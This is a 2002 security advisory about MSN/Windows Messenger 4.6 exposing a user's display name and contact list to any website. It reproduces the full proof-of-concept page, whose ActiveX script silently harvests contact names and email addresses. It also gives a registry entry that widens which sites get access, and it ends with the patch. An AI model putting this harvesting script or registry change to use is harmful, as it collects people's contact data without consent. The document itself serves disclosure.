26th Sep 2002 [SBWID-5062]
COMMAND
MSN (or Windows) Messenger contact list can be stolen by any website
SYSTEMS AFFECTED
MSN Messenger 4.6.0073 (latest at 02/02/2002) on Windows 2000 with IE 6.
Windows Messenger 4.6.0073 (latest at 02/02/2002) on Windows XP with IE 6.
Probably other versions and other platforms too.
PROBLEM
Richard Burton reported:
MSN Messenger (and Windows Messenger on XP) can be used to obtain
personal information about a user from any website (in any domain).
Using JavaScript a user's display name can be obtained from Messenger,
as well as the display names of all their contacts. For users who have
a sensible and accurate display name this should be considered a
privacy issue. (Note: anyone who has not set a display name at all,
will reveal their email address instead.)
Using the same technique web sites hosted on certain domains
(microsoft.com, hotmail.com & hotmail.msn.com) can also access the
email address of the user (along with the email addresses of all their
contacts). This could be used by Microsoft to track users on their
sites, which many would consider to be a privacy issue.
In addition to the three domains mentioned above, additional domains
can be allowed access to the email addresses with a single registry
entry. This registry entry could be made by spyware/adware installed by
a user (sometimes unknowingly, along with a piece of shareware). Once
such an entry exists, your email address can be handed to any site
that requests it, which could then store it in a cookie.
Technical
=========
Microsoft designed Messenger to allow functionality to be used in
webpages using JavaScript or VBScript. This includes the ability to
view the display name and email address of the user and their contacts.
In an attempt to protect users only a certain selection of sites can
use script to get email addresses, but all can get display names.
The list of domain suffixes that have full access to Messenger
functionality (email addresses & more?) can be found in the
registry in key
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\Suffixes".
Values "Suffix0", "Suffix1", etc. By default there are no entries in
the list, but they can be added. E.g. adding value Suffix0 = "test.com"
will give web sites in the test.com domain full access to Messenger
information.
Full domain names do not have to be specified in the list; adding "com"
would give all .com sites full access.
Although by default there are no entries in this list, three domains
(listed above) are hard coded into Messenger for the same purpose.
These allow Microsoft to make their sites (e.g. Hotmail) look nice by
integrating messenger features into them. The user cannot remove the
special status applied to these sites.
For a simple how-to, just look at the source of the demonstration page
given below.
[http://raburton.members.easyspace.com/msn/] :
<html>
<head>
<title>MSN Messenger Privacy</title>
<div id="divMsgrObject" style="display:none">
<object classid='clsid:F3A614DC-ABE0-11d2-A441-00C04F795683' codetype='application/x-oleobject' height='1' id='MsgrObj' width='1'>
</object>
<object classid='clsid:FB7199AB-79BF-11d2-8D94-0000F875C541' codetype='application/x-oleobject' height='1' id='MsgrApp' width='1'>
</object>
</div>
<script event="onload" for="window" language="javascript">
// some variables
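// Demonstration script, IE-only (bound through <script for="window" event="onload">).
// Reads the local user's display name and full contact list from the
// Messenger ActiveX control (MsgrObj, the <object> declared above) and
// shows them in the "details" form.  No user interaction or consent is
// involved, which is exactly the privacy problem this page demonstrates.
var textlist = "";   // one "FriendlyName (EmailAddress)" line per contact
var you = "";        // the local user's own "FriendlyName (LogonName)", or a status message
var installed = true;
var i;               // loop index; the original loop leaked it as an implicit global
var list;            // the Messenger contact collection
var contact;         // current item while walking the collection
// Probe for the control.  IE throws from ActiveXObject when the control
// is missing or blocked, so either path marks Messenger as absent.
try {
  var xObj = new ActiveXObject("Messenger.MsgrObject");
  if (xObj == null) {
    installed = false;
  }
} catch (e) {
  installed = false;
}
if (installed) {
  // isStateOnline() is defined in a later <script> block on this page;
  // window.onload fires after the whole document has been parsed.
  if (isStateOnline(MsgrObj.LocalState)) {
    // get contact list
    list = MsgrObj.List(0);
    // get you!
    you = MsgrObj.LocalFriendlyName + " (" + MsgrObj.LocalLogonName + ")";
    // get your friends (EmailAddress reads as "undefined" unless the
    // hosting domain is on Messenger's allowed-suffix list; see the page text)
    for (i = 0; i < list.Count; i++) {
      contact = list.Item(i);   // fetch each contact once instead of twice per iteration
      textlist = textlist + contact.FriendlyName + " (" + contact.EmailAddress + ")\n";
    }
  } else {
    // must be offline
    you = " - MSN Messenger is not connected. - ";
  }
} else {
  // not installed
  you = " - MSN Messenger is not installed. - ";
}
// fill in the form
document.forms.details.you.value = you;
document.forms.details.friends.value = textlist;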
</script>
</head>
<body onScroll='nyw2()' onLoad='nyw1()' onMove='nyw2()' onResize='nyw2()' >
<SCRIPT>
<!--
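// State for the easyspace ad banner injected into the hosted page.  The
// names are obfuscated; the meanings below are inferred from how
// nyw1()/nyw2() use them and should be read as a best guess.
var nyw3 = 0;     // extra vertical offset added to the banner's top
var nyw4 = 62;    // banner height (matches height=62 on the banner tables)
var nyw5 = 470;   // horizontal offset of the small tab from the full banner
var nyw6 = 12;    // width of the expand/shrink button column (12px images)
var nyw7 = 200;   // window must be at least this tall and wide before the banner shows
var nyw8 = 0;     // 1 once nyw1() has positioned and shown the banner
var nyw9 = 0;     // 1 while the banner is shrunk (see nyw25/nyw26)
var nyw0, nyw10;  // nyw0 is compared in nyw1() but never assigned here; nyw10 is the poll timer id
var nyw11, nyw12, nyw13, nyw14;  // nyw8 was declared a second time in this line; the duplicate is dropped
var nyw15, nyw16, nyw17 = 500;   // nyw15/nyw16: last seen page offsets; nyw17: poll interval in ms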
// Position and reveal the ad-banner layers (nyw18 = full banner,
// nyw19 = small tab).  Called from <body onLoad>.  Returns true early
// when the banner has already been set up (nyw8 == 1), when nyw0 holds
// the opt-out value, or when the window is smaller than nyw7 pixels.
// NOTE(review): nyw20, nyw21, nyw22 and nyw23 are assigned without var,
// so they become implicit globals; nyw2(), nyw25() and nyw26() read
// them.  Declaring them locally here would break those functions.
function nyw1()
{
if(nyw8==1)
return true;
if(document.all)
{
// IE branch: document.all() lookups and CSS visibility keywords.
nyw11=document.all("nyw18").style;
nyw12=document.all("nyw19").style;
nyw20=nyw4+nyw3+0;
nyw21=nyw5+nyw6+nyw3;
nyw22='visible';
nyw23='hidden';
}
else
{
// Netscape 4 branch: document.<layer> objects and show/hide keywords;
// the extra 15px presumably compensates for scrollbars — unverified.
nyw22='show';
nyw23='hide';
nyw11=document.nyw18;
nyw12=document.nyw19;
nyw20=nyw4+nyw3+15;
nyw21=nyw5+nyw6+nyw3+15;
}
// nyw0 is declared in this script but never assigned, so in the visible
// code this comparison is always false (looks like an external opt-out
// hook — TODO confirm).
if(nyw0=="00550240")
{
if(document.all)
{
nyw12.display='none';
nyw11.display='none';
}
return true;
}
// Do not show the banner in windows narrower or shorter than nyw7.
if(document.all)
{
if(document.body.clientHeight<nyw7||document.body.clientWidth<nyw7)
return true;
}
else if(document.layers)
{
if(window.innerHeight<nyw7||window.innerWidth<nyw7)
return true;
}
// Mark as done, place both layers, show the full banner, and on
// Netscape 4 start the scroll-polling loop (IE uses the body's
// onScroll/onResize handlers instead).
nyw8=1;
nyw2();
nyw11.visibility=nyw22;
if(document.layers)
nyw24();
}
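// Netscape 4 (document.layers) only: poll the scroll position and
// re-anchor the banner whenever it changes.  nyw1() starts this loop;
// the timer id is kept in nyw10.
function nyw24()
{
  if (pageXOffset != nyw15 || pageYOffset != nyw16)
  {
    nyw15 = pageXOffset;
    nyw16 = pageYOffset;
    nyw2();
    // While the page is scrolling, poll quickly (20 ms) and drop back
    // to the slow 500 ms interval one second later.  The original wrote
    // the reset as setTimeout("checkTime=500",1000): the obfuscator
    // renamed checkTime to nyw17 everywhere except inside that string,
    // so the interval never returned to 500 ms.
    if (nyw17 >= 500)
    {
      nyw17 = 20;
      setTimeout(function () { nyw17 = 500; }, 1000);
    }
  }
  // Pass the function itself rather than a string to be evaluated.
  nyw10 = setTimeout(nyw24, nyw17);
}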
// Re-anchor both banner layers: at the bottom-right of the viewport while
// the page is in its top half (or shorter than the viewport), otherwise
// at the top-right.  Uses the implicit globals nyw20 / nyw21 computed in
// nyw1().  No-op until nyw1() has run (nyw8 still 0).
function nyw2()
{
if(!nyw8)
return true;
if(document.all)
{
// IE: geometry from document.body.  Bottom-anchor while the document is
// shorter than the viewport or the scroll position is in the top half.
if(document.body.scrollHeight<document.body.clientHeight
||document.body.scrollTop<((document.body.scrollHeight-document.body.clientHeight)/2))
{
nyw11.top=document.body.scrollTop+document.body.clientHeight-nyw20;
nyw12.top=document.body.scrollTop+document.body.clientHeight-nyw20;
}
else
{
nyw11.top=document.body.scrollTop+nyw3;
nyw12.top=document.body.scrollTop+nyw3;
}
// Full banner flush with the right edge; the small tab sits nyw5 px
// further right.
nyw11.left=document.body.scrollLeft+document.body.clientWidth-nyw21;
nyw12.left=document.body.scrollLeft+document.body.clientWidth-nyw21+nyw5;
}
else if(document.layers)
{
// Netscape 4: same placement using window.pageX/YOffset and inner/outer
// sizes.
if(window.pageYOffset<((window.outerHeight-window.innerHeight)/2))
{
nyw11.top=window.pageYOffset+window.innerHeight-nyw20;
nyw12.top=window.pageYOffset+window.innerHeight-nyw20;
}
else
{
nyw11.top=window.pageYOffset+nyw3;
nyw12.top=window.pageYOffset+nyw3;
}
nyw11.left=window.pageXOffset+window.innerWidth-nyw21;
nyw12.left=window.pageXOffset+window.innerWidth-nyw21+nyw5;
}
}
// Shrink the banner: hide the full-size layer (nyw18 / nyw11), show the
// small tab layer (nyw19 / nyw12) and cancel the pending timer nyw14.
// nyw22 / nyw23 hold the browser-specific show/hide tokens chosen in
// nyw1().  Wired to the "shrink banner" link's onClick.
function nyw25()
{
  var shown = nyw22;
  var hidden = nyw23;
  nyw9 = 1;
  nyw12.visibility = shown;
  nyw11.visibility = hidden;
  clearTimeout(nyw14);
}
// Expand the banner again: hide the small tab layer (nyw19 / nyw12) and
// show the full-size layer (nyw18 / nyw11).  nyw22 / nyw23 are the
// browser-specific show/hide tokens picked in nyw1().  Wired to the
// "expand banner" link's onClick.
function nyw26()
{
  var shown = nyw22;
  var hidden = nyw23;
  nyw9 = 0;
  nyw12.visibility = hidden;
  nyw11.visibility = shown;
}
//-->
</SCRIPT>
<DIV ID="nyw19" STYLE="position: absolute; top: 0; left: 0; visibility: hidden; z-index: 2147483632;">
<table border=0 cellspacing=0 cellpadding=0 height=62 bgcolor="#EEEEEE">
<tr>
<td valign="top"><a href="" title="Click here to expand banner" onClick="nyw26(); return false;"><img src="http://banner.easyspace.com/left.gif" width=12 height=12 border=0></a></td>
</tr>
<tr>
<td valign="bottom"><a href="http://www.easyspace.com/" target="_blank"><img src="http://banner.easyspace.com/littlelogo.gif" border=0></a></td>
</tr>
</table>
</DIV>
<DIV ID="nyw18" STYLE="position: absolute; top: 0; left: 0; z-index: 2147483647; visibility: hidden">
<table border=0 cellspacing=0 cellpadding=0 height=62>
<tr>
<td rowspan=2 valign="top"><A TARGET="_new" HREF="http://www.easyspace.com"><IMG SRC="http://banner.easyspace.com/ESBIZ-468-6.gif?r=0.0380174302486864" width=468 height=60 border=0 ALT="Nothing personal. Just business."></A></td>
<td bgcolor="#EEEEEE" valign="top"><a href="" title="Click here to shrink banner" onClick="nyw25(); return false;"><img src="http://banner.easyspace.com/right.gif" width=12 height=12 border=0></a></td>
</tr>
<tr>
<td bgcolor="#EEEEEE" valign="bottom"><a href="http://www.easyspace.com/" target="_blank"><img src="http://banner.easyspace.com/littlelogo.gif" border=0></a></td>
</tr>
</table>
</DIV>
<h1>MSN Messenger Privacy</h1> <br>
If you are running MSN messenger (and have JavaScript enabled) you should see
your name displayed below, along with a list of all your contacts. <br>
Note: this has been tested on MSN Messenger (4.6.0073) for Win2k & Windows
Messenger (4.6.0073) for WinXP (all with IE 6).<br>
<br>
If this page was hosted on microsoft.com, hotmail.com or hotmail.msn.com you
would also see your email address and your contacts email addresses (instead of
"undefined"). <br>
<br>
This information could be placed in a cookie and next time you request an item
from the server (page, image, etc.), this information would be sent back to the
server, allowing Microsoft to know who you are and who your friends are. <br>
<br>
By default, everyone has access to your display name and those of your contacts,
but only Microsoft can get your email address this way. However third parties
could get access to the email addresses, by simply adding a single entry to your
registry. That would require a little more effort, but is easily done. <br>
e.g. Installing software which contains "spyware" or "adware" (such as Kazaa, Go!Zilla,
Direct Connect, etc.*), could easily add such an entry to your registry. After
that you could be sending your email address to them every time your computer
loads an advertising banner from their site. <br>
<br>
To demonstrate what this would look like from a Microsoft server, or to a third
party after a registry entry has been placed on your computer, add the following to your
registry (<a href="suffix0.reg">or run this file</a>) and reload this page: <br>
In key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\Suffixes
(you may need to create the Suffixes key) <br>
Add String: "Suffix0", Value: "raburton.members.easyspace.com" <br>
Note: this value doesn't have to be a complete host name, adding just "com"
would open your contact list to any .com website. <br>
<form id="details">
You are:<br>
<input type="text" readonly value="" id="you" size="80">
<br>
<br>
Your friends are:<br>
<textarea readonly value="" id="friends" cols="80" rows="10">
</textarea>
</form>
Richard Antony Burton (<a href="mailto:[email protected]">[email protected]</a>)
- 02/02/2002
<br><br>
* spyware/adware info from <a href="http://spychecker.com">spychecker.com</a>
<br><br>
<!-- Start of TheCounter.com Code -->
<SCRIPT TYPE="text/javascript" LANGUAGE="javascript">
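// TheCounter.com hit-counter, part 1: default the beacon fields and record
// the referring URL.  These are shared with the two <script> blocks that
// follow, so they must stay global; declaring them with var avoids
// creating them as implicit globals.
var s = "na";                             // screen width
var c = "na";                             // colour depth
var j = "na";                             // Java enabled?
var f = "" + escape(document.referrer);   // referring page, URL-encoded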
</SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="javascript1.2">
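// TheCounter.com hit-counter, part 2 (javascript1.2 only): browsers that
// run this block overwrite the "na" defaults with real screen/Java values.
var s = screen.width;
var v = navigator.appName;   // was an implicit global
if (v !== "Netscape") {
  c = screen.colorDepth;
} else {
  c = screen.pixelDepth;    // Netscape's name for the same property
}
j = navigator.javaEnabled();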
</SCRIPT>
<SCRIPT TYPE="text/javascript" LANGUAGE="javascript">
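// TheCounter.com hit-counter, part 3: write the counter image.  Its query
// string sends screen size, colour depth, referrer and Java status to
// c2.thecounter.com on every page view — a third-party tracking beacon
// unrelated to the Messenger demonstration.
function pr(n) { document.write(n, "\n"); }
var NS2Ch = 0;   // 1 on Netscape 2.x, where the image is skipped (reason not stated in the source)
if (navigator.appName === "Netscape" &&
    navigator.appVersion.charAt(0) === "2") { NS2Ch = 1; }
if (NS2Ch === 0) {
  var r = "&size=" + s + "&colors=" + c + "&referer=" + f + "&java=" + j + "";
  pr("<A HREF=\"http://www.TheCounter.com\" TARGET=\"_top\"><IMG" +
     " BORDER=0 SRC=\"http://c2.thecounter.com/id=1045755" + r + "\"><\/A>");
}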
</SCRIPT>
<NOSCRIPT><A HREF="http://www.TheCounter.com" TARGET="_top"><IMG
SRC="http://c2.thecounter.com/id=1045755" ALT="TC" BORDER=0></A>
</NOSCRIPT>
<!-- End of TheCounter.com Code -->
</body>
<script language="javascript">
// is user online?
// Return true when a Messenger LocalState value counts as signed in.
// The codes are the ones the original switch treated as online:
// 2 online, 6 invisible, 10 busy, 14 be right back, 18 idle, 34 away,
// 50 on the phone, 66 out to lunch.  Any other value yields false.
// Comparison is strict (as with switch), so the string "2" is not online.
function isStateOnline(state) {
  var onlineStates = [2, 6, 10, 14, 18, 34, 50, 66];
  var k;
  for (k = 0; k < onlineStates.length; k++) {
    if (onlineStates[k] === state) {
      return true;
    }
  }
  return false;
}
</script>
</html>
SOLUTION
At this time, the only way for a user to prevent sites having any
access to their information is by logging out of Messenger before
visiting.
Update (14 February 2002)
======
Get patch 4.6.0076 from :
http://messenger.microsoft.com/Default.asp